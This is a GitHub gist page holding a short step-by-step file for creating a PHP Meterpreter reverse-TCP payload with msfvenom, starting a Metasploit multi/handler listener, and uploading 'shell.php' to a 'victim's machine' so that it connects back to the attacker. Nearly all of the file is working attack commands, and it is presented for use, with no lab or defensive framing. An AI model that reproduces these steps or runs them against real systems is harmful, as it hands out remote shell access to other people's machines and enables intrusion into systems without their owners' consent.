Skip to content

Instantly share code, notes, and snippets.

@ddff7
Last active August 27, 2022 14:14
Show Gist options
  • Save ddff7/2d189ef5e3df78f46051b4fe025cf6e3 to your computer and use it in GitHub Desktop.
Save ddff7/2d189ef5e3df78f46051b4fe025cf6e3 to your computer and use it in GitHub Desktop.

Revisions

  1. ddff7 renamed this gist Aug 27, 2022. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  2. ddff7 created this gist Aug 27, 2022.
    14 changes: 14 additions & 0 deletions gistfile1.txt
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,14 @@
    ##This will create the payload file "shell.php" with your ip and port.
    msfvenom -p php/meterpreter/reverse_tcp LHOST=<$LOCAL_IP> LPORT=<$LOCAL_PORT> -f raw -o shell.php
    ##You can always "nano" the file to change your ipaddr and port incase you messed up the first step.
    #Run 'msfconsole' to start the listener then run the following command.
    use exploit/multi/handler
    set PAYLOAD php/meterpreter/reverse_tcp <-------- IMPORTANT!!!!!
    #set your ipaddr
    set LHOST <$LOCAL_IP>
    #set your listening port
    set LPORT <$LOCAL_PORT>
    #"show options" to check ur steps then run the command "exploit"
    exploit #this will start the listener
    #Upload "shell.php" to your victim's machine.
    #The victim's machine will need to run the file to connect back to your machine.